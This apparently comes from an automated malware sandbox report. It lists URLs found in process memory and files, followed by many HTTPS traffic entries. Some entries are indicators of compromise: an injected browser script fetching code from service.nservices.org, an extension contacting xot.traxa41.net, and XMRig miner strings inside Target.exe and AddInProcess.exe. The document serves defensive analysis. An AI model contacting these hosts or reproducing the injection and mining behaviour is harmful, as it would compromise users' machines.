Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://i.y.qq.com/n2/m/index.html
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://m.kugou.com/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://m.soundcloud.com/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://m.vk.com/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://music.amazon.com
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://music.apple.com
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://music.yandex.com
Source: 4cb013792b196a35_0.10.dr	String found in binary or memory: https://ntp.msn.com
Source: 4cb013792b196a35_1.10.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&enableNetworkFirs
Source: 4cb013792b196a35_0.10.dr	String found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
Source: svchost.exe, 00000007.00000003.1738844921.000001CC776C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000007.00000003.1738844921.000001CC77656000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://open.spotify.com
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://outlook.live.com/mail/0/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://outlook.office.com/mail/0/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
Source: chromecache_514.13.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_520.13.dr	String found in binary or memory: https://plus.google.com
Source: chromecache_520.13.dr	String found in binary or memory: https://plus.googleapis.com
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
Source: zcezeaqsuhi.exe, 00000002.00000002.2017176866.000002A5BB72A000.00000004.00000800.00020000.00000000.sdmp, zcezeaqsuhi.exe, 00000002.00000002.2017176866.000002A5BB73E000.00000004.00000800.00020000.00000000.sdmp, injected-script.js.2.dr	String found in binary or memory: https://service.nservices.org/api/browser/GetScript?id=$
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1666984608.000001DFA9511000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000001.00000002.4116525327.000001D09B6C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://tidal.com/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://twitter.com/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.10.dr	String found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.10.dr	String found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.10.dr	String found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://vibe.naver.com/today
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://web.telegram.org/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://web.whatsapp.com
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://word.new?from=EdgeM365Shoreline
Source: chromecache_520.13.dr	String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://www.deezer.com/
Source: content.js.10.dr, content_new.js.10.dr	String found in binary or memory: https://www.google.com/chrome
Source: chromecache_520.13.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_520.13.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chromecache_514.13.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_514.13.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_514.13.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://www.iheart.com/podcast/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://www.instagram.com
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://www.last.fm/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://www.messenger.com
Source: 4cb013792b196a35_1.10.dr	String found in binary or memory: https://www.msn.com/web-notification-icon-light.png
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://www.office.com
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://www.tiktok.com/
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://www.youtube.com
Source: Target.exe, 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 00000014.00000002.4110650202.0000000140465000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/benchmark/%s
Source: Target.exe, 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 00000014.00000002.4110650202.0000000140465000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: Target.exe, 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 00000014.00000002.4110650202.0000000140465000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard
Source: Target.exe, 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 00000014.00000002.4110650202.0000000140465000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard%s
Source: zcezeaqsuhi.exe, 00000002.00000002.2017176866.000002A5BB6DA000.00000004.00000800.00020000.00000000.sdmp, 2cc80dabc69f58b6_0.10.dr, background.js.2.dr, 2cc80dabc69f58b6_1.10.dr	String found in binary or memory: https://xot.traxa41.net
Source: 097fdca7-1191-436a-b8f7-6bd14d31d610.tmp.10.dr	String found in binary or memory: https://y.music.163.com/m/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50230
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
